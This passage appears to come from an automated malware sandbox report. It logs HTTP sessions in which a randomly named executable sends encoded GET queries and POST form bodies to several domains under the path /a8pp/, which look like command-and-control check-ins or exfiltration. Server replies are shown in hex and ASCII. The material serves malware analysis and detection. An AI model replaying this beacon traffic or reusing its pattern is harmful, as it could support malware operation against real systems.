                                        Data Ascii: 2NlhHLS8=TVLbZXn3Qe4MDHrh5u4GeApgZDw+cNb++x+l6H1PrhtSmZePEnr+UmA8L+Iphw14xPCVaUEPhuKgJHCuzfOWCoGCW6igceGoduP0c4ouNq+GxUaOi4AMv0dp/CXYE6HGmSrnf1v0Xk5WLobwTj44a0/NhMM9sflN06u9g57Is4h2f/yj53y1fzdFJSXoVpfOX6JrR/rDkpko9lZ01nHt2QeSsxob++Gl/wMQYcn7p9huh+yq8KF0Y6DzrRg1tk0pGXBdLqv0pig56SU3aK6ra0A894ew7fK+8dOlBuGdL1Urf54DHjr+iI+m0SHUBYk34wzSP8NcItf4uNVSS8rI9oTi/NMaPfNue6kXVC+WrwjXl9bCg8o7x/UveP6t64h1YZgs+pfSQ9ZSLiacAkIw7D2KODdBcXVIYKwCXIqByxbMjTWFLTrZgWzsqlJ+NuY5g1sG44CFp4BRIl/uJH2DP8XvJHHsKV4PK+okdpJMBq+PrX7Ll9SaSXvd3vM8PaJzf67oJEzO3FXVNZERbwnzo/WCYsYglQXbCfkM38820vZkZwlPf62mVg8CgHSzM42YYNtma1E8A2GHF+t1SxjlmronAE4crsEgr8+w4KmSM3FoJQsIz9ePQC6gT5jMyyxbCW2s4zYP42BWt5m/OViattCL4y56WXvNIiVpdeXpQa5/jfbVbJlZLFHVpUTtRN2fl9nQ3F0qHlSj1VE+wQckXsavfNB7+OM8Afr2aXeptqzUXUSBC4OghI19inKWE1wc48GuVhOPn+qIv+VtZDMev0TC563AyLn9CHJOw15OW8epF3H6LJ7DqU4oRpfTJwuDmvPEcGZgL6ktaiB78+Dl2Iy+5iZAlL3ayWSAW519oKcGOKy8ubnYDVQJSSaWqZzjdd7sEIccYahbWPXvoRV37rogOqzuLpqTfTMmqm2u3SNlZIb5VCzaGIWHFVTqysYwnwL+MQNlXGj4AS9+StdZAlmf2bqAolO3U45GkS1ejse [TRUNCATED]
                                        Jun 4, 2024 14:38:47.771619081 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        65192.168.11.304985991.195.240.19807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:50.305811882 CEST478OUTGET /a8pp/?2NlhHLS8=eXj7agnwQ7UtDQTI2/QeRjNOKmxKRYHEwlq+kXNt3DleoKuUYGucHmIzSo9PpxNipdSpHjsdoNiIZ3Hh69GYDO27Wp3lPM6WDcDlV706K5XwonPjk8UKoRY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.continentaloilandgas.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:38:50.532887936 CEST208INHTTP/1.1 403 Forbidden
                                        content-length: 93
                                        cache-control: no-cache
                                        content-type: text/html
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        66192.168.11.3049860172.67.205.56807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:55.664139986 CEST760OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4d 74 36 34 33 78 7a 4a 77 36 49 6d 39 30 70 46 65 30 7a 7a 58 31 49 52 2b 6c 46 71 47 48 6b 67 78 71 52 55 48 37 61 66 66 5a 4a 33 31 76 7a 69 73 6a 64 71 77 57 79 38 39 39 66 33 6c 44 2f 37 56 63 6f 72 79 4b 65 70 6d 74 37 71 74 4f 57 4e 6f 54 53 6b 33 67 4f 4f 4f 73 75 66 6c 67 53 78 54 79 55 45 76 69 7a 68 79 77 36 44 4a 36 54 67 6b 48 32 69 5a 53 66 78 44 41 7a 77 6f 6b 66 55 76 44 71 57 71 69 50 6e 45 6c 6f 62 61 73 70 76 37 46 61 79 4e 37 4a 32 4a 71 41 41 43 70 35 6b 38 69 30 74 38 38 57 69 78 44 6c 64 6e 64 51 6a 57 6c 57 45 73 4d 31 47 43 33 4f 72 6e 71 32 68 79 41 3d 3d
                                        Data Ascii: 2NlhHLS8=Mt643xzJw6Im90pFe0zzX1IR+lFqGHkgxqRUH7affZJ31vzisjdqwWy899f3lD/7VcoryKepmt7qtOWNoTSk3gOOOsuflgSxTyUEvizhyw6DJ6TgkH2iZSfxDAzwokfUvDqWqiPnElobaspv7FayN7J2JqAACp5k8i0t88WixDldndQjWlWEsM1GC3Ornq2hyA==
                                        Jun 4, 2024 14:38:55.853091955 CEST816INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:38:55 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVYIeUgeJM2iSerEYXbiCBNgvROa2HKaTzGuckGW%2BIDT%2B%2FKFsNa3MPvAsQqQ3A58M7QckRIKFeEIMgcnJks0FI86emKaFL0QqSYHkZefh%2F6%2FNRXxXus%2FlbwapIICfchqKJGvLHbpGyOsqxOQ"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7fb964f03674e-ATL
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:38:55.853205919 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        67192.168.11.3049861172.67.205.56807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:38:58.317362070 CEST780OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4d 74 36 34 33 78 7a 4a 77 36 49 6d 2f 56 5a 46 62 53 37 7a 44 6c 49 53 69 56 46 71 66 58 6b 6b 78 71 64 55 48 2f 43 50 66 4b 74 33 31 4f 44 69 72 52 31 71 31 57 79 38 7a 64 66 75 39 6a 2f 73 56 63 6c 65 79 4f 61 70 6d 74 76 71 74 50 47 4e 6f 6c 61 6e 32 77 4f 49 49 73 75 64 36 77 53 78 54 79 55 45 76 69 33 66 79 78 53 44 4a 4c 6a 67 6c 69 43 68 55 79 66 79 43 41 7a 77 69 30 65 38 76 44 71 77 71 6a 54 42 45 6e 51 62 61 74 5a 76 37 30 61 39 57 4c 4a 30 48 4b 42 50 4c 62 39 74 35 77 4d 5a 33 64 32 66 70 43 34 68 6d 4b 68 35 4c 6d 69 47 2f 73 4a 72 65 32 6a 44 6c 6f 33 36 76 46 51 58 69 72 49 64 36 79 64 46 4d 57 4b 62 55 46 44 75 51 39 59 3d
                                        Data Ascii: 2NlhHLS8=Mt643xzJw6Im/VZFbS7zDlISiVFqfXkkxqdUH/CPfKt31ODirR1q1Wy8zdfu9j/sVcleyOapmtvqtPGNolan2wOIIsud6wSxTyUEvi3fyxSDJLjgliChUyfyCAzwi0e8vDqwqjTBEnQbatZv70a9WLJ0HKBPLb9t5wMZ3d2fpC4hmKh5LmiG/sJre2jDlo36vFQXirId6ydFMWKbUFDuQ9Y=
                                        Jun 4, 2024 14:38:58.581917048 CEST812INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:38:58 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rdVjSQqYhmHZoSDcL62rKDPjeokpTQrN4vpyWslW61cTHPAL88Qj0KcpvVBE7wxPzLq8v%2FqkuZnE9SDqW7C9SJC1Jd7udz%2BUTWgErmxDBXrGv9c%2FE3vOS11z6AaciU4nJyINpMRHc%2ByYM9JW"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7fba6e840748f-MIA
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:38:58.581938982 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        68192.168.11.3049862172.67.205.56807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:00.977001905 CEST1697OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Origin: http://www.barrettdigitalart.com
                                        Referer: http://www.barrettdigitalart.com/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4d 74 36 34 33 78 7a 4a 77 36 49 6d 2f 56 5a 46 62 53 37 7a 44 6c 49 53 69 56 46 71 66 58 6b 6b 78 71 64 55 48 2f 43 50 66 4b 6c 33 31 59 66 69 73 41 31 71 32 57 79 38 73 74 66 72 39 6a 2f 74 56 63 73 57 79 4f 58 53 6d 76 58 71 74 74 65 4e 2f 41 36 6e 34 77 4f 49 45 4d 75 59 6c 67 53 65 54 7a 34 49 76 69 6e 66 79 78 53 44 4a 49 72 67 6c 33 32 68 57 79 66 78 44 41 7a 6b 6f 6b 66 52 76 48 2f 4c 71 6a 48 33 48 58 77 62 61 4e 4a 76 6f 69 4f 39 61 4c 4a 71 41 4b 41 51 4c 61 41 31 35 77 41 2f 33 65 72 36 70 41 6f 68 6e 65 77 62 66 69 33 62 69 65 6f 68 62 55 37 66 6c 6f 62 2b 73 46 73 70 6e 4e 59 39 7a 78 56 64 41 78 61 78 4a 33 2f 76 4a 6f 6e 77 49 63 33 37 69 6a 41 32 53 36 4c 7a 67 53 74 58 66 59 47 36 58 31 55 30 59 41 5a 63 51 53 52 54 7a 6b 52 49 4d 73 50 39 4e 6d 73 76 4a 66 65 4b 33 2f 76 6c 4d 50 6f 46 34 65 74 5a 5a 39 2f 44 59 33 2f 63 59 6a 55 66 35 75 56 68 72 59 77 6c 38 58 46 59 37 53 77 4f 62 63 79 6f 6a 31 69 61 70 35 4f 41 66 4c 7a 49 38 69 57 33 43 59 7a 72 6c [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=Mt643xzJw6Im/VZFbS7zDlISiVFqfXkkxqdUH/CPfKl31YfisA1q2Wy8stfr9j/tVcsWyOXSmvXqtteN/A6n4wOIEMuYlgSeTz4IvinfyxSDJIrgl32hWyfxDAzkokfRvH/LqjH3HXwbaNJvoiO9aLJqAKAQLaA15wA/3er6pAohnewbfi3bieohbU7flob+sFspnNY9zxVdAxaxJ3/vJonwIc37ijA2S6LzgStXfYG6X1U0YAZcQSRTzkRIMsP9NmsvJfeK3/vlMPoF4etZZ9/DY3/cYjUf5uVhrYwl8XFY7SwObcyoj1iap5OAfLzI8iW3CYzrlYc14ilVSV7XV7LyaTmd/XiUBbeNi0YKKsw7Ci+J97jpXF4vA+gpmTFANNxTBLzNUTuKrp1e3Z+sfBDitgcpl1BEw+agfg+/CjUn+R9yXCKPIbJMMPbOBeAJ/NMpIiZtbVm1nKJDtW9vt1mYoJEhUMg5kHAtCPySH14QizTEMKFsTtPfdBl8y5QCtpDd33y5ybAIgbgv+E8M5ztXY4voGdG8D/J4HTm72xyiARSxo85XMa2MmZnm1bh5dfA9/xSvRa5zc1IfEm/IvK0gta+qpqi7Z9uBxLpeSWVu2Zaxm0s9AFVUuIFwFi/Zn2qUPSL08FRdbExoNMnJnD0wd8sLKqnthtSUF3yZAtry2P2foM5QWXUfDO/3YvxBSyYKDYR0VcGs20Z1/9ZOBjq8tAsOR6EGxboSq/psjbILCUHkNdVT0mzTY6hkiZ9ohZyQ3BaMo8OSfrZKS0w0Qcf4ffDD5ZOQ5vxJ+SD+hz3wk0KzA+eNRvAAhGCEuQtV4k9CK1Tmb85erNYLeLg9I9vp/aouTVy1umYMzu8IVkZQqzGhtxArRFgI+xtm5/9IqPPwUqyoo9x5jYckPSjjSEKihkSkfUC2m9cwbysklFJHnmRMtJShbz0rv6DZzL7ANksphs4fuUXN9ztIsS9GDfzJz0Euf+Wj5KlCrGo4QYB [TRUNCATED]
                                        Jun 4, 2024 14:39:01.189018011 CEST818INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:39:01 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2Af226UEr%2Brce51AE1m1JR1%2BJOeHRa6jFa2%2FLarEr2jkKzpRNvAmtmtNOJfy6%2FIZleQqtBz2n2rjvXc2RI6cKjRBko4Ki0P97R59p7NSpdglCmf75wR9iNVjyRC8am%2BxQHS%2B2X5FZCy%2FQY6"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7fbb7890a495a-MIA
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:39:01.189029932 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        69192.168.11.3049863172.67.205.56807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:03.630337954 CEST475OUTGET /a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.barrettdigitalart.com
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:03.812156916 CEST962INHTTP/1.1 301 Moved Permanently
                                        Date: Tue, 04 Jun 2024 12:39:03 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.barrettdigitalart.com/a8pp/?2NlhHLS8=BvSY0HG9ptJk0xE7dSL0fFQR6AxOGAU+8c5Ef4OBDo9qqf/VxjEZ5E2E1NHp9TnNNsYisL6gkMTIkNi6jhWj2SyZPZL3px+pF3gDkQLIxS6HPpaQiGGsZmE=&0z=jXZhddsppL
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0pNF9IloBKBX3yKeUlnJbbk7w7ghwlMtdlxJbnkBi9zyKBjVL64Lmmxvn0tA6lMOjbouGxrRh3WU%2F%2BZxcH98fueMJN2fN%2Fep5%2BnhYyxWTOjagOWbRFiJTCxWEtegbpIB%2Bux%2F%2BwBlhLASbFIG"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 88e7fbc81b0db0a9-ATL
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                        Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.22.1</center></body></html>
                                        Jun 4, 2024 14:39:03.812179089 CEST5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        70192.168.11.3049864162.0.237.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:08.995440960 CEST745OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4e 73 52 43 6c 61 76 67 77 31 31 66 68 6e 2b 45 39 4c 68 66 66 49 7a 35 54 6c 45 4c 66 61 52 30 68 56 4c 6f 30 2b 47 59 54 72 49 6d 50 70 56 43 65 72 44 47 70 2b 56 78 61 69 42 2b 38 47 65 6e 55 76 55 6a 69 73 39 53 75 34 70 66 4d 6b 43 4d 74 4d 6e 32 44 4e 31 74 48 69 2f 37 46 54 2f 35 4a 6a 4d 41 48 49 76 75 6e 63 2f 53 65 35 43 59 50 58 4c 41 52 4a 4d 38 65 36 2b 2f 63 71 64 68 66 56 70 6e 6a 62 43 35 59 68 37 39 31 67 52 45 38 2f 44 78 51 4e 55 65 6c 4b 6b 72 47 46 41 43 41 62 4e 31 66 47 6d 55 39 6d 37 71 35 56 65 32 65 48 55 43 6a 5a 51 38 4e 49 74 4f 52 75 55 64 2b 77 3d 3d
                                        Data Ascii: 2NlhHLS8=NsRClavgw11fhn+E9LhffIz5TlELfaR0hVLo0+GYTrImPpVCerDGp+VxaiB+8GenUvUjis9Su4pfMkCMtMn2DN1tHi/7FT/5JjMAHIvunc/Se5CYPXLARJM8e6+/cqdhfVpnjbC5Yh791gRE8/DxQNUelKkrGFACAbN1fGmU9m7q5Ve2eHUCjZQ8NItORuUd+w==
                                        Jun 4, 2024 14:39:09.173477888 CEST533INHTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:39:09 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        71192.168.11.3049865162.0.237.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:11.709048986 CEST765OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
